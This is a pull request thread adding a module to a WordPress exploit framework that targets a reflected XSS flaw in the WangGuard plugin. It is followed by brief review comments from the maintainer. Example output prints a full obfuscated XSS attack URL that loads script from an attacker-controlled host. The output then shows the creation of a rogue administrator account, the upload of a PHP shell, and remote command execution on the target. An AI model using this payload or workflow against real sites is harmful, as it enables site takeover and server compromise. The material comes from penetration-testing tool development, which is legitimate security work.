Add "wang guard" reflected xss shell upload module

[phyushin]

This module exploits the "Wang Guard" WordPress plugin; the plugin can be downloaded from the following URL:
https://wordpress.org/plugins/wangguard/

Fixed in : 1.7.3

References:

• WPVDBID : 8725

• Disclosure : https://www.pluginvulnerabilities.com/2017/01/17/reflected-cross-site-scripting-xss-vulnerability-in-wangguard/

example output:

wpxf > use exploit/wang_guard_reflected_xss_shell_upload 

  [+] Loaded module: #<Wpxf::Exploit::WangGuardReflectedXssShellUpload:0x000000025da230>

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set host 192.168.0.27

  [+] Set host => 192.168.0.27

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set xss_host 192.168.0.20

  [+] Set xss_host => 192.168.0.20

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set payload exec

  [+] Loaded payload: #<Wpxf::Payloads::Exec:0x000000029a3470>

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set cmd whoami

  [+] Set cmd => whoami

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set http_server_bind_port 8080

  [+] Set http_server_bind_port => 8080

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > check

  [!] Target appears to be vulnerable

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > run

  [-] Provide the URL below to the victim to begin the payload upload

http://192.168.0.27/wp-admin/admin.php?page=wangguard_users_info&userIP=%3Cscript%3Eeval(String.fromCharCode(101,118,97,108,40,100,101,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,47,118,97,114,37,50,48,97,37,50,48,37,51,68,37,50,48,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,37,50,56,37,50,50,115,99,114,105,112,116,37,50,50,37,50,57,37,51,66,97,46,115,101,116,65,116,116,114,105,98,117,116,101,37,50,56,37,50,50,115,114,99,37,50,50,37,50,67,37,50,48,37,50,50,104,116,116,112,37,51,65,37,50,70,37,50,70,49,57,50,46,49,54,56,46,48,46,50,48,37,51,65,56,48,56,48,37,50,70,77,86,79,77,109,106,88,75,37,50,50,37,50,57,37,51,66,100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,37,50,56,97,37,50,57,37,51,66,47,46,115,111,117,114,99,101,41,41))%3C%2Fscript%3E%3C

  [-] Started HTTP server on 0.0.0.0:8080
  [-] Incoming request received, serving JavaScript...
  [+] Created a new administrator user, NSmEGs:SUgRuqaMLt
  [-] HTTP server stopped
  [-] Authenticating with WordPress using NSmEGs:SUgRuqaMLt...
  [-] Uploading payload...
  [-] Executing the payload at
      http://192.168.0.27/wp-content/plugins/nQTYgAukGE/eghhALlKVD.php...
  [+] Result: www-data
  [+] Execution finished successfully

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > 

[phyushin]

i've closed this PR will resubmitted when i've tested it on windows too

[rastating]

@phyushin - there is no official Windows support, but either way, your module won't have environmental issues, so re-open if you wish.

[phyushin]

ok that's done - sorry for the spam

[rastating]

Could you move the query string from this method into the interpolation within url_with_xss instead? There's no functional difference, but would just make it a bit easier to read.

[phyushin]

no worries ... will retest then push

[rastating]

Tested and merged, thanks 🥇